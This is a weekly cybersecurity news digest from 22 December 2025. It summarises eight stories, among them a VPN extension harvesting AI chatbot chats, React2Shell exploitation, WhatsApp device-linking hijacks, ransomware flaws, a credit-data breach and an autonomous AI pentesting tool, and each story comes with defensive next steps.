Interesting Cybersecurity News of the Week Summarised – 22-12-2025

I go through about 25 cybersecurity news portals and blogs every week and pull out the most interesting stories. Then I turn them into this short, digestible summary, so you can stay up to date without trying to follow 25 different sources yourself. 😱 My aim is to create a summary that gives you the gist without needing to open up the source article. But if you do want to dig deeper, all the sources covering the event are linked below each story.

If you enjoy these, come back next Monday

or

scroll to the bottom to subscribe to the e-mail newsletter.

1. Hidden Data Harvest in Popular “Free” “Privacy” and “Security” Extensions Exposes AI Chats of Millions

Researchers at Koi discovered that the “Featured” Urban VPN Proxy browser extension secretly intercepted every prompt and response from ChatGPT, Claude, Gemini, Copilot and other AI chatbots. Since a July 2025 update, it has exfiltrated full conversation data—including timestamps and session metadata—from more than 8 million users across Chrome and Edge, selling it via a known data broker. 

Key Details

• Version 5.5.0 (July 9 2025) introduced silent script injection on AI chatbot pages.
• Injected scripts override fetch() and XMLHttpRequest to capture raw API traffic.
• All data—prompts, responses, conversation IDs, timestamps—flows to analytics.urban-vpn.com and stats.urban-vpn.com.
• Collected information is sold for marketing analytics through BiScience, a third-party data broker.
• Seven sister extensions (1ClickVPN Proxy, Urban Browser Guard, Urban Ad Blocker) share identical harvesting code.

Next Steps

• Uninstall Urban VPN Proxy and related extensions immediately.
• Enforce browser extension whitelists and audit installed add-ons.
• Monitor enterprise traffic for unauthorized calls to analytics.urban-vpn.com domains.

Read more at Cybersecurity News, Dark Reading, The Hacker News, CSO Online, Koi Security Blog

2. React2Shell Flaw Drives Global Backdoor and Ransomware Campaigns

The critical React2Shell vulnerability (CVE-2025-55182) has been aggressively exploited by state-linked actors and ransomware gangs to deploy Linux backdoors (KSwapDoor, ZnDoor) and Weaxor ransomware—often within minutes of breach—while over 111,000 hosts remain unpatched.  With a record ~200 public exploits enabling unauthenticated remote code execution and follow-on activities from credential theft to root login enablement, this flaw demands immediate patching and active threat hunting.

Key Details

• At least five China-linked groups and other actors have used React2Shell to deploy seven Linux backdoors and RATs.
• Weaxor ransomware executed within 60 seconds of initial access, disabling Defender and wiping shadow copies.
• Attackers harvest cloud metadata tokens and run secret-discovery tools (TruffleHog, Gitleaks) for lateral movement.

Next Steps

• Deploy React2Shell patches and verify CVE-2025-55182 fixes.

Read more at The Hacker News, BleepingComputer, CyberScoop

3. GhostPairing Attack Hijacks WhatsApp Accounts via Device Linking

New GhostPairing campaign tricks users into linking attackers’ browsers to their WhatsApp accounts by abusing the legitimate device‐pairing feature, granting full and stealthy access to messages and media. The attack, first spotted in Czechia, uses familiar “found your photo” lures and fake Facebook login pages to prompt victims to enter pairing codes, allowing adversaries to monitor chats and propagate the scam through compromised contacts.

Key Details

• Campaign leverages WhatsApp’s device linking via pairing codes or QR codes.
• Victims receive bogus Facebook‐style content previews claiming “found your photo.”
• Attack remains invisible—no lockout—letting adversaries read history and media.
• Compromised accounts auto‐forward the same lure to victim’s contacts.

Next Steps

• Audit Settings → Linked Devices and remove unknown sessions.
• Treat any out‐of‐band pairing code or QR prompt as suspicious.
• Enable WhatsApp Two‐Step Verification for an additional PIN layer.

Read more at Cybersecurity News, Bleeping Computer, Malwarebytes

4. VolkLocker Ransomware Includes Hard-Coded Master Key, Enables Free Decryption

CyberVolk’s new VolkLocker RaaS version embeds a plaintext master key in a temporary file and never deletes it, allowing victims to decrypt their files without paying. It’s a good example of how poor coding and security practices can have direct revenue implications for both victims and adversaries.

Key Details

• Master key is hard-coded in the binary and backed up to %TEMP%\system_backup.key in plaintext
• RaaS managed via Telegram; licensing costs $800–$1,100 per OS or $1,600–$2,200 for both Linux and Windows

Read more at The Hacker News, Dark Reading

5. 700Credit Data Breach Exposes Personal Data of 5.8 Million Vehicle Buyers

700Credit, a leading provider of credit checks and identity verification services for over 18,000 North American dealerships, has revealed that a compromised third-party API allowed attackers to access its web application from May through October 2025, exposing names, addresses, dates of birth and Social Security numbers of 5.8 million individuals. 

700Credit communicates with over 200 integration partners through APIs. One of those partners was compromised in July, but the company did not notify 700Credit. Hackers took over that partner’s system and gained access to communications logs, which exposed an API used to pull consumer information. The breach revealed a vulnerability in 700Credit’s validation process.

Key Details

• Breach discovered October 25, 2025, after unusual activity in 700Dealer.com application.
• Threat actor breached integration partner in July 2025, they did not notify 700Dealer.com about it. API remained exposed until October.
• 5,836,521 records copied, covering data submitted by dealerships between May and October 2025.
• 700Credit offers 12 months of complimentary credit monitoring and identity restoration services.
• Company filed a consolidated notification with the FTC, notified state attorneys general, and reported to the FBI.

Next Steps

• Perform a full audit of all partner APIs and enforce strict access controls.
• Revise vendor SLAs to mandate immediate breach notification and forensic support.
• Deploy continuous monitoring on external-facing endpoints for abnormal data access.

Read more at SecurityWeek, HackRead, Bleeping Computer

6. Gentlemen Ransomware Uses BYOVD and GPO Attacks for Double Extortion

Gentlemen ransomware, first seen in August 2025, now targets enterprises in at least 17 countries with a double extortion scheme that exfiltrates data before encrypting it.
Written in Go for cross-platform deployment, it leverages Group Policy Object tampering and “bring your own vulnerable driver” techniques to disable defenses and spread internally.

Key Details

• Imacts sectors including healthcare, manufacturing and insurance across 17 countries.
• Disables Windows Defender and halts Veeam, MSSQL and MongoDB services before encryption.
• Anti-analysis check requires a valid –password argument to run payload.
• Selective file encryption modes (–fast, –ultrafast) encrypt 9%–1% of file content.

Next Steps

• Review risks around data exposure and update mitigation plans.
• Review ransomware response plans and make sure they include data exposure element.
• Block unauthorized driver loads.

Read more at Cybersecurity News

7. GhostPoster Steganography Attack Hides Malware in Firefox Extension Icons

Researchers at Koi Security have uncovered a steganography-based campaign dubbed GhostPoster that hides malicious JavaScript payloads inside PNG icons of at least 17 Firefox extensions installed over 50,000 times. 

Key Details

• The malware searches for a hidden marker (===) in the logo’s raw bytes. Everything after that marker is executable code, invisible to scanners and code reviewers.
• The payload waits 48 hours between C2 check-ins.
• Only activates 10% of the time. Won’t run until 6+ days after install. Designed to evade sandbox analysis.
• Malware disables Content-Security-Policy headers, injects iframes, tracks users, hijacks affiliate commissions.

Next Steps

• Audit and remove untrusted Firefox extensions immediately.
• Block C&C domains (e.g., l i v e u p d t . c o m) at network level.
• Enforce extension whitelisting and strict Content-Security-Policy across endpoints.

Read more at Koi Security Blog, Cybersecurity News, SecurityWeek

8. Shannon: Autonomous AI Pentesting Tool Validates Code Vulnerabilities with Real Exploits

Shannon is a fully autonomous AI-powered penetration tester for web applications that performs white-box code analysis and executes live browser exploits to confirm real vulnerabilities rather than just flagging potential issues.  
It achieved a 96.15% success rate on the XBOW benchmark—surpassing human pentesters—and delivers reproducible proofs-of-concept in reports.  

Key Details

• 96.15% success rate on XBOW benchmark vs. 85% for humans and proprietary systems
• Confirmed OWASP-critical flaws: injection, XSS, SSRF, broken authentication/authorization
• Discoveries: 20+ critical issues in OWASP Juice Shop; 15 in c{api}tal API with injection chaining and bypasses
• Typical run duration 1–1.5 hours at an estimated cost of ~$50 per test

Next Steps

• Consider Integrating Shannon into CI/CD pipelines on non-production environments
• Evaluate the AGPL-3.0 Lite edition for internal proof-of-concept tests

Read more at Cybersecurity News, GitHub

Subscribe

Subscribe to receive this weekly cybersecurity news summary to your inbox every Monday.